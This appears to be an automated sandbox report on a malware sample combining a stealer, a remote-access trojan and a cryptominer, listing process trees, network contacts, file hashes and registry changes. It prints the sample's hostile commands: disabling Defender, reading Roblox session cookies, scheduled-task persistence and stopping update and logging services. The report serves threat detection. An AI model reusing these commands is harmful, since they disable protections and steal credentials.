Malware Analysis Report

2024-10-10 09:55

Sample ID 240701-cg91lasgna
Target 6850a8c541b310a2f4a5cd88352856a3.bin
SHA256 98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda
Tags
umbral xmrig xworm evasion execution miner persistence rat stealer trojan upx spyware
score
10/10

Analysis Overview

score
10/10

SHA256

98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda

Threat Level: Known bad

The file 6850a8c541b310a2f4a5cd88352856a3.bin was found to be: Known bad.

Malicious Activity Summary

umbral xmrig xworm evasion execution miner persistence rat stealer trojan upx spyware

Detect Umbral payload

Umbral

Detect Xworm Payload

xmrig

Xworm

XMRig Miner payload

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

.NET Reactor proctector

UPX packed file

Checks computer location settings

Power Settings

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Views/modifies file attributes

Modifies registry class

Detects videocard installed

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-01 02:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-01 02:04

Reported

2024-07-01 02:06

Platform

win7-20240508-en

Max time kernel

2s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XMRKNZQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {E3AD2D07-DE2F-4A6D-92F1-B00B34649A3A} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp

Files

memory/2164-0-0x000007FEF5193000-0x000007FEF5194000-memory.dmp

memory/2164-1-0x000000013FE50000-0x0000000140150000-memory.dmp

memory/2272-6-0x0000000002D90000-0x0000000002E10000-memory.dmp

memory/2272-8-0x0000000002720000-0x0000000002728000-memory.dmp

memory/2272-7-0x000000001B6A0000-0x000000001B982000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBQGIKRMSH1GXMZEJG8S.temp

MD5 171e4596826b2ad10e319469ecb1b8cf
SHA1 2e423d08e9e4b88dc34f9753b69e86f294f9e28d
SHA256 811d2032058427b5847c128645a6928932213596163288fd88dcfb05e2fb9438
SHA512 474d3efb94f35ed851fc5a9d9c7b94c71dd4371dd4d6980de86d32aec4c6c5d56049787cae365b73d40b7a9e2a3df10992271903e13b23fbc4b4be607d49cd59

memory/2632-23-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/2632-22-0x000000001B690000-0x000000001B972000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

MD5 a1d8db2a1ff742bc73dd5617083f5fde
SHA1 957b182d82efb40a36099dd886ad581977880838
SHA256 d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a
SHA512 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

memory/2424-29-0x00000000002F0000-0x0000000000330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

MD5 f0b33cc162bfd36a995b8c90cd8ebff1
SHA1 ca1ddef08d47fc15a44a2d651b61e3decce8ebc6
SHA256 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0
SHA512 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

MD5 c137c5f5287d73a94d55bc18df238303
SHA1 95b4b01775bea14feaaa462c98d969eb81696d2c
SHA256 d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0
SHA512 ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

memory/1856-47-0x0000000001360000-0x0000000001548000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

MD5 0df0a039309525fd27e1b5e056c92b6a
SHA1 7551c27a9123cb56c4218647966a753794ac2961
SHA256 a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f
SHA512 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

memory/1880-61-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-60-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-59-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-58-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1880-56-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-54-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-52-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-51-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1856-49-0x0000000005A20000-0x0000000005AD6000-memory.dmp

memory/1752-68-0x0000000001D30000-0x0000000001D38000-memory.dmp

memory/1752-67-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/1584-74-0x000000001B620000-0x000000001B902000-memory.dmp

memory/1584-75-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

memory/476-94-0x0000000001E90000-0x0000000001E98000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4a5887281298574ed5243753fd6f3d15
SHA1 be4f930dc2b31fece3e8b5afdbdeca328e7d1439
SHA256 40a090399f5e0b09f05f55a694ec2c35b6786dd261dfd4e2d8b1d8650f25a0c3
SHA512 76945f3617e6b63ae39cc1a4e5be75dff0cad15b33d3d4ac7c5d7fb15c3d80e62d391a3ddea00eed629ae1cf2fb7cad032248d5b1ba0b28fbfb027ecd43defb9

memory/2988-108-0x0000000002790000-0x0000000002798000-memory.dmp

memory/2988-107-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

\Users\Admin\AppData\Roaming\svchost.exe

MD5 9af17c8393f0970ee5136bd3ffa27001
SHA1 4b285b72c1a11285a25f31f2597e090da6bbc049
SHA256 71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512 b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

memory/3032-138-0x0000000001D40000-0x0000000001D48000-memory.dmp

memory/3032-137-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2292-144-0x0000000019F60000-0x000000001A242000-memory.dmp

memory/2292-145-0x0000000000A20000-0x0000000000A28000-memory.dmp

memory/2444-157-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-162-0x00000000001B0000-0x00000000001D0000-memory.dmp

memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-159-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-155-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-158-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-156-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1656-153-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-149-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-148-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-147-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-146-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-150-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2976-170-0x0000000000C70000-0x0000000000CB0000-memory.dmp

memory/2616-173-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

memory/2444-174-0x0000000140000000-0x0000000140848000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-01 02:04

Reported

2024-07-01 02:06

Platform

win10v2004-20240611-en

Max time kernel

13s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\URL Protocol C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347 C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2128 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2128 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2128 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2128 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
